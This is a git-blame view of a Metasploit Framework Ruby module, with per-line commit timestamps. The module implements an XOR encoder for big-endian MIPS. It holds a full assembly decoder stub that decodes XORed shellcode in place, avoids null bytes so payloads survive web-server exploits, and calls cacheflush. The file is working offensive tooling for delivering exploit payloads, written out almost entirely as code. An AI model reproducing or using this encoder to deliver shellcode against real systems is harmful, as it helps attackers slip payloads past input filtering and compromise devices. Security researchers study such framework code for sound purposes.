2008-09-15 18:50:34 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2008-09-15 18:50:34 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'metasm'
|
|
|
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Encoder::Xor
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'XOR Encoder',
|
|
|
|
'Description' => %q{
|
|
|
|
Mips Web server exploit friendly xor encoder
|
|
|
|
},
|
2014-07-11 17:45:23 +00:00
|
|
|
'Author' => 'Julien Tinnes <julien[at]cr0.org>',
|
2013-08-30 21:28:54 +00:00
|
|
|
'Arch' => ARCH_MIPSBE,
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Decoder' =>
|
|
|
|
{
|
|
|
|
'KeySize' => 4,
|
|
|
|
'BlockSize' => 4,
|
|
|
|
'KeyPack' => 'N',
|
|
|
|
})
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the decoder stub that is adjusted for the size of the buffer
|
|
|
|
# being encoded.
|
|
|
|
#
|
|
|
|
def decoder_stub(state)
|
|
|
|
|
|
|
|
# add one xor operation for the key (see comment below)
|
|
|
|
number_of_passes=state.buf.length/4+1
|
2015-05-18 20:36:15 +00:00
|
|
|
raise EncodingError.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 10240
|
|
|
|
raise EncodingError.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
# 16-bits not (again, see below)
|
|
|
|
reg_14 = (number_of_passes+1)^0xFFFF
|
|
|
|
decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
|
2008-09-15 18:50:34 +00:00
|
|
|
;
|
|
|
|
; MIPS nul-free xor decoder
|
|
|
|
;
|
|
|
|
; (C) 2006 Julien TINNES
|
|
|
|
; <julien at cr0.org>
|
|
|
|
;
|
|
|
|
; The first four bytes in encoded shellcode must be the xor key
|
|
|
|
; This means that you have to put the xor key right after
|
|
|
|
; this xor decoder
|
|
|
|
; This key will be considered part of the encoded shellcode
|
|
|
|
; by this decoder and will be xored, thus becoming 4NULs, meaning nop
|
|
|
|
;
|
|
|
|
; This is Linux-only because I use the cacheflush system call
|
|
|
|
;
|
|
|
|
; You can use shellforge to assemble this, but be sure to discard all
|
|
|
|
; the nul bytes at the end (everything after x01\\x4a\\x54\\x0c)
|
|
|
|
;
|
|
|
|
; change 2 bytes in the first instruction's opcode with the number of passes
|
|
|
|
; the number of passes is the number of xor operations to apply, which should be
|
|
|
|
; 1 (for the key) + the number of 4-bytes words you have in your shellcode
|
|
|
|
; you must encode ~(number_of_passes + 1) (to ensure that you're nul-free)
|
|
|
|
|
|
|
|
|
|
|
|
;.text
|
|
|
|
;.align 2
|
|
|
|
;.globl main
|
|
|
|
;.ent main
|
|
|
|
;.type main,@function
|
|
|
|
|
|
|
|
main:
|
|
|
|
|
|
|
|
li macro reg, imm
|
|
|
|
; lui reg, ((imm) >> 16) & 0ffffh
|
|
|
|
; ori reg, reg, (imm) & 0ffffh
|
2013-08-30 21:28:54 +00:00
|
|
|
addiu reg, $0, imm ; sufficient if imm.abs <= 0x7fff
|
2008-09-15 18:50:34 +00:00
|
|
|
endm
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
li( $14, #{reg_14}) ; 4 passes
|
|
|
|
nor $14, $14, $0 ; put number of passes in $14
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
li( $11,-73) ; addend to calculated PC is 73
|
2008-09-15 18:50:34 +00:00
|
|
|
;.set noreorder
|
|
|
|
next:
|
2013-08-30 21:28:54 +00:00
|
|
|
bltzal $8, next
|
2008-09-15 18:50:34 +00:00
|
|
|
;.set reorder
|
2013-08-30 21:28:54 +00:00
|
|
|
slti $8, $0, 0x8282
|
|
|
|
nor $11, $11, $0 ; addend in $9
|
|
|
|
addu $25, $31, $11 ; $25 points to encoded shellcode +4
|
2008-09-15 18:50:34 +00:00
|
|
|
; addu $16, $31, $11 ; $16 too (enable if you want to pass correct parameters to cacheflush
|
|
|
|
|
|
|
|
; lui $2, 0xDDDD ; first part of the xor (old method)
|
2013-08-30 21:28:54 +00:00
|
|
|
slti $23, $0, 0x8282 ; store 0 in $23 (our counter)
|
2008-09-15 18:50:34 +00:00
|
|
|
; ori $17, $2, 0xDDDD ; second part of the xor (old method)
|
2013-08-30 21:28:54 +00:00
|
|
|
lw $17, -4($25) ; load xor key in $17
|
2008-09-15 18:50:34 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
li( $13, -5)
|
|
|
|
nor $13, $13, $0 ; 4 in $13
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
addi $15, $13, -3 ; 1 in $15
|
2008-09-15 18:50:34 +00:00
|
|
|
loop:
|
2013-08-30 21:28:54 +00:00
|
|
|
lw $8, -4($25)
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
addu $23, $23, $15 ; increment counter
|
|
|
|
xor $3, $8, $17
|
|
|
|
sltu $30, $23, $14 ; enough loops?
|
|
|
|
sw $3, -4($25)
|
|
|
|
addi $6, $13, -1 ; 3 in $6 (for cacheflush)
|
|
|
|
bne $0, $30, loop
|
|
|
|
addu $25, $25, $13 ; next instruction to decode :)
|
2008-09-15 18:50:34 +00:00
|
|
|
|
|
|
|
|
|
|
|
; addiu $4, $16, -4 ; not checked by Linux
|
|
|
|
; li $5,40 ; not checked by Linux
|
|
|
|
; li $6,3 ; $6 is set above
|
|
|
|
|
|
|
|
; .set noreorder
|
2013-08-30 21:28:54 +00:00
|
|
|
li( $2, 4147) ; cacheflush
|
|
|
|
;.ascii "\\x01JT\\x0c" ; nul-free syscall
|
|
|
|
syscall 0x52950
|
2008-09-15 18:50:34 +00:00
|
|
|
; .set reorder
|
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
; write last decoder opcode and decoded shellcode
|
2008-09-15 18:50:34 +00:00
|
|
|
; li $4,1 ; stdout
|
|
|
|
; addi $5, $16, -8
|
2010-04-30 08:40:19 +00:00
|
|
|
; li $6,40 ; how much to write
|
2008-09-15 18:50:34 +00:00
|
|
|
; .set noreorder
|
|
|
|
; li $2, 4004 ; write
|
|
|
|
; syscall
|
|
|
|
; .set reorder
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
nop ; encoded shellcoded must be here (xor key right here ;)
|
2008-09-15 18:50:34 +00:00
|
|
|
; $t9 (aka $25) points here
|
|
|
|
|
|
|
|
EOS
|
2013-08-30 21:28:54 +00:00
|
|
|
# put the key at the end of the decoder
|
|
|
|
state.decoder_key_offset = decoder.length - 4
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
return decoder
|
|
|
|
end
|
2008-09-15 18:50:34 +00:00
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|